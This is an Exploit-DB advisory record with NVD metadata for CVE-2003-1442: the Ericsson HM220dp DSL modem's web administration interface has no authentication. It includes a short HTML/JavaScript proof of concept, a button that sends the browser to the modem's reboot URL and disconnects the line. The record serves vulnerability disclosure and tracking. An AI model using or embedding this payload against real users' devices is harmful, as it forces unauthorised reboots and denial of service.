Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability
2003-02-11T00:00:00
ID: EDB-ID:22244; Type: exploitdb; Reporter: Davide Del Vecchio; Modified: 2003-02-11T00:00:00
Description
Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability. CVE-2003-1442. Remote exploit for hardware platform.
source: http://www.securityfocus.com/bid/6824/info
The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. Access to this interface does not require any authentication, and there is no option to enable an authentication requirement.
[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]
{"id": "EDB-ID:22244", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability", "description": "Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability. CVE-2003-1442 . Remote exploit for hardware platform", "published": "2003-02-11T00:00:00", "modified": "2003-02-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/22244/", "reporter": "Davide Del Vecchio", "references": [], "cvelist": ["CVE-2003-1442"], "lastseen": "2016-02-02T18:18:11", "viewCount": 7, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-02T18:18:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1442"]}], "modified": "2016-02-02T18:18:11", "rev": 2}, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/22244/", "sourceData": "source: http://www.securityfocus.com/bid/6824/info\r\n\r\nThe Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. \r\n\r\n[script]\r\nfunction exploit(){\r\nwindow.location = \"view-source:http://www.example.com/dummy.html?reboot=1\";\r\n}\r\n[/script]\r\n[input type=\"button\" value=\"disconnect\" onClick=\"exploit();\"]\r\n\r\n", "osvdbidlist": ["59601"]}
{"cve": [{"lastseen": "2021-02-02T05:22:10", "description": "The web administration page for the Ericsson HM220dp ADSL modem does not require authentication, which could allow remote attackers to gain access from the LAN side.", "edition": 4, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1442", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2003-1442"], "modified": "2017-07-29T01:29:00", "cpe": ["cpe:/h:ericsson:hm220dp_adsl_modem:*"], "id": "CVE-2003-1442", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1442", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:h:ericsson:hm220dp_adsl_modem:*:*:*:*:*:*:*:*"]}]}